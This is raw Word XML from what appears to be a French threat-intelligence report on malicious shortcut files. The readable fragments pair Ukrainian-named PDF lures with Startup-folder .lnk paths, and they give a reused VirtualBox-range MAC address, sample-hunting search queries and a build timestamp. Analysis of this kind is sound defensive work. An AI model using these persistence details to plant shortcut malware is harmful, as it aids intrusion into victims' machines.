            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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1c170b7470d507378d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340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4169040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3212890" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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289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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">про працівників №20260316-9055897-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44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4257305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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db78e9d66305f1184e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545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4345570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3178917" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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89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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1.pdf:..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.._Roaming_Microsoft_Window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6480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4352948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="889588" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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958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17 mars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75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4433835</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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965baaf2d27ededb23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852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4522100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="650017" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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01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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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95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4610365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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a318a58953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0576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4698630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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Menu_Programs_Startup_yXZ9BtFU2OewE.lnk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160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5052960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="419512" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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51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Рота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26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5052960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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bf338d88f60c0d352c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36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5229490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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d0d1b5e4bc6a1d9f1a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4672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5229490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3181013" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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101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забезпечення.pdf:..</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle37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4"/>
                            <w:spacing w:val="29"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> ..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.._Roaming_Micro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5696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5325133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="812054" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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20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5 mars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672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5406020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1495202" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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520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soft_Windows_Start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77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5406020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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c8fe1df48516ec0042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876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5582550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2796025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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6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Menu_Programs_Startup_bSU3CQN_vy.lnk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97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5582550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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cafda821e9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081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5936880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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507b2fcdae058cebbd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184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6025145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3180734" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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07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2523</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle34"/>
                            <w:spacing w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve">20535670.pdf:..</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle83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 .._.._Roaming_Micr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28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6113410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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550965b90c44e878d7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3888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6201675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1572037" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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203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osoft_Windows_Start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4912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6209053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="889448" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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94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3 février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59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6289940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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a2463058c846eeb68f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696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6378205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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Menu_Programs_Startup_bfF3BxteabXqg.lnk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79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6466470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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0dc1b48eda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900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6820800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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f9d2907d6b1de3078a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0032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6909065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3180734" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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073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2523</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle34"/>
                            <w:spacing w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve">18618928.pdf:..</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle83"/>
                            <w:spacing w:val="69"/>
                          </w:rPr>
                          <w:t xml:space="preserve">..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 .._.._Roaming_Micr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10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6997330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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0f111cc98764a92baf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2080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7085595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1572037" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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203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osoft_Windows_Start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3104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5685790</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7092973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="889448" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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94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3 février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41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7173860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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606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5ebd06cc8ab02637a6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5152" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2434589</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7262125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2872720" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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72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Menu_Programs_Startup_QhVES3g47D9.lnk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61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7350390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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250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5eff3b7f3a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7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7966298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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L'analyse des métadonnées suggère que l'adresse MAC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08:00:27:9e:ef:74</w:t>
                        </w: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 est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8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8162948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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réutilisée entre plusieurs échantillons. Cette adresse est associée à PCS Systemtechnik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9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8336303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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GmbH. Ce marqueur pourrait conserver un intérêt opérationnel dans les cas où le nom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0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8509658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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NetBIOS de la machine varierait alors que le matériel resterait inchangé. Une recherche sur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1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8683013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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cette adresse MAC (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle33"/>
                            <w:spacing w:val="2"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">entity:file metadata: "08:00:27:9e:ef:74"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) ne renvoie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2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8868433</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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toutefois que les échantillons déjà identifiés. De même, une recherche sur son encodage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3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9041788</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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hexadécimal (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle33"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">entity:file content:{0800279EEF74}</w:t>
                        </w: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) ne révèle aucun échantillon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4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9227208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1029383" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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93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supplémentaire.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53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4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641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4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74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4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846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4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948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4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37075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8561069"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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85610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8561069">
                          <a:moveTo>
                            <a:pt x="0" y="591184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="591184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2122169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2122169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59118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591820"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="591820"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7536814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7536814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8561069"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8561069"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7536814"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7064374"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7064374"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7537449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7537449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7064374"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5010149"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5010149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7065009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7065009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5010149"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4265929"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4265929"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5010149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5010149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4265929"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3296919"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3296919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4265929"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4265929"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3296919"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2396489"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2396489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3296919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3296919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2396489"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2121535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2121535"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2396489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2396489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2121535"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="591184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="591184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2122169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2122169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59118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591820"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59182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792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3111509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="6439534"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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64395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6439534">
                          <a:moveTo>
                            <a:pt x="0" y="5415279"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5415279"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6439534"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6439534"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5415279"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4942839"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4942839"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5415914"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5415914"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4942839"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2888614"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2888614"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4943474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4943474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2888614"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2144394"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2144394"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2888614"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2888614"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2144394"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1175384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1175384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2144394"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2144394"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1175384"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="274954"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="274954"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1175384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1175384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="27495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274954"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="27495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97376" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5969635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1167139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="690883" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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88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87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690879" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="69087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0147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1383039</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1591309" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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130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9130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1590674" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1590674" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="159130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05568" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4467860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1699269</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="364490" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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49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449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363854" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36449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09664" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3148329</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5370839</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3474720" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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4720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4720" h="199390"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3474084" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3474084" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3474720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13760" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4321810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5586739</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="935989" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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98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598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935355" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="935355" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="93598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17856" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6460490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5586739</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="200659" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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65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5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200024" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="200024" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="20065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219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5801369</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="854709" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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470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4709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854074" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="854074" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="854709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26048" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4168140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6118869</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2493009" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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300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9300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2492374" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2492374" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="249300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342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6333499</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1182369" cy="941069"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2369" cy="9410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82369" h="941069">
                          <a:moveTo>
                            <a:pt x="635" y="941069"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="741680"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="608964" y="741680"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="941069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1181735" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1181735" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="118236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2432" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3566160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7467609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2111378" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1378" cy="414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11374" h="414020">
                          <a:moveTo>
                            <a:pt x="635" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="526414" y="214630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="526414" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="527049" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1395095" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1395095" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2111374" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2111374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4480" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4370705</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9352289</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0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6528" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1552575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9352289</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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755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3501387</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="502297"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="451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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-123" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="5022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502297">
                          <a:moveTo>
                            <a:pt x="0" y="502297"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="50229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50229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857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5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960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5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0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45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Les métadonnées de compilation indiquent également que l'ensemble des é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chantillons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1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1152748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5777127" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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7127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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">semble avoir été généré à la même date et à la même heure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2026-01-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2672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1368013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1694723" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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472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20T21:55:42.805285Z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3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1684878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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L'étude des lignes de commande contenus dans ces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.lnk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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> met en évidence une forte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4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1881528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
